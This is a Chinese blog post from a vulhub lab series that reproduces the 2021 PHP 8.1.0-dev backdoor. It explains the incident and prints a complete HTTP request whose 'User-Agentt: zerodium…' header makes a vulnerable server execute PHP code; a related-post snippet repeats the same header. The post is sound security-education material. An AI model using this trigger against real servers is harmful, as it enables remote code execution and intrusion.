PHP 8.1.0-dev 开发版本后门事件

最新推荐文章于 2024-05-20 23:24:51 发布
最新推荐文章于 2024-05-20 23:24:51 发布
阅读量477 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/118878764
版权

漏洞背景

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。

漏洞复现

发送如下数据包,可见代码var_dump(233*233);成功执行:

GET / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
User-Agentt: zerodiumvar_dump(233*233);
Connection: close

在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
php-8.1.0 开发后门复现
lionwerson的博客
06-02 593
1
PHP-8.1.0-dev 后门命令执行漏洞复现
Shadow_DAI_990101的博客
09-08 2202
想必大家都了解,这里就不过多赘述了没啥可说的,是一个无聊的漏洞。
2、PHP 8.1.0-dev 后门远程命令执行漏洞复现
最新发布
weixin_51520483的博客
05-20 395
3、bp抓包发现PHP版本8.1.0-dev。4、尝试使用以前爆出过的漏洞(网上查相关案例)1、青少年ctf,题目PHP后门
vulhub漏洞复现51_PHP
weixin_44193247的博客
02-11 892
vulhub漏洞复现练习篇
PHP 8.1.0-dev后门复现
weixin_46137328的博客
01-18 1744
0x01 简介PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来...
PHP-8.1.0-dev 后门命令执行漏洞复现_zerodiumvar_dump
资深程序员,曾自学JAVA,C#,如今从业于网安行业
12-26 595
如果你也想学习:黑客&网络安全的SQL攻防。
最新版windows mysql-8.1.0-winx64.zip
08-02
最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip
i686-8.1.0-release-posix-dwarf-rt_v6-rev0.7z
06-30
MinGW-W64的32位安装包:i686-8.1.0-release-posix-dwarf-rt_v6-rev0.7z ,支持GCC8.1.0,线程模型为posix,异常处理模型为dwarf, 解压后即可使用。 mingw-w64 版本选择方法: 32位系统选择i686, 64位系统选择x86_...
i686-8.1.0-release-posix-sjlj-rt_v6-rev0.7z
08-06
MinGW-W64的32位安装包:i686-8.1.0-release-posix-sjlj-rt_v6-rev0.7z支持GCC8.1.0, 解压后即可使用。 利用下载工具下载的也是此压缩包,然后解压缩而已。 方便没梯子的!!!!
MinGW(x86_64-8.1.0-release-posix-sjlj-rt_v6-rev0.7z)
03-24
总之,MinGW(x86_64-8.1.0-release-posix-sjlj-rt_v6-rev0.7z)是一个适用于64位Windows系统的GCC编译器版本,提供了一套完整的开发环境,便于开发人员在Windows上编写、编译和调试跨平台的C和C++程序。
x86_64-8.1.0-release-win32-seh-rt_v6-rev0.rar
11-14
标题 "x86_64-8.1.0-release-win32-seh-rt_v6-rev0.rar" 暗示了这是一个针对x86_64架构的编译器或开发环境的下载包,版本号为8.1.0,并且是针对Windows 32位系统(尽管它本身是64位程序)的,具有结构化异常处理...
PHP/8.1.0-dev 后门命令执行漏洞复现
m0_63253040的博客
09-25 1654
题目描述:题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。一开始这里我有个空格在:后面,所以执行不成功,去掉空格就成功了。没有发现什么点,目录扫描也没有结果,打开bp抓包。搜索PHP/8.1.0-dev
青少年CTF、PHP后门PHP/8.1.0-dev漏洞
weixin_69830800的博客
11-15 1898
题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。
HackTheBox-Knife靶场实战
qq_36584013的博客
05-26 597
HackTheBox-Knife靶场实战 靶场信息 信息搜集 首先使用nmap进行端口扫描 我们得知开启了22和80端口 出于能不爆破就不爆破的原则,先访问80端口看一下 80端口上的内容有点不明所以。 在完全没思路的情况下,尝试使用dirbuster工具进行了目录爆破,但四十分钟过去了却没有一丁点收获,连robots.txt页面也不存在。 我的思路就卡在这里了,一时之间不知道应该...
vulhub 8.1-backdoor漏洞复现
qq_46804551的博客
05-26 677
前言 PHP版本8.1.0-dev于2021年3月28日植入了后门,但很快发现并删除了该后门。当服务器上存在此后门时,攻击者可以通过发送User-Agentt标头执行任意代码。 复现 用vulhub搭好环境后 在请求头中构造如下payload User-Agentt: zerodiumvar_dump(233*233); 执行系统命令: ...
PHP zerodium后门漏洞
课嗨教育的专栏
04-27 863
漏洞类型 任意代码执行 触发条件 提交的请求包中,如果字符串以'zerodium'开头,那么该行将从useragent HTTP标头(“ HTTP_USER_AGENTT”)中执行PHP代码
mingw-w64-x86-64-v8.1.0-win32-seh
07-28
mingw-w64-x86-64-v8.1.0-win32-seh可以用于开发和编译各种类型的应用程序,包括命令行工具、图形界面应用以及动态链接库(DLL)。它提供了一系列的工具和库,如编译器、链接器、调试器等,可以帮助开发人员进行代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值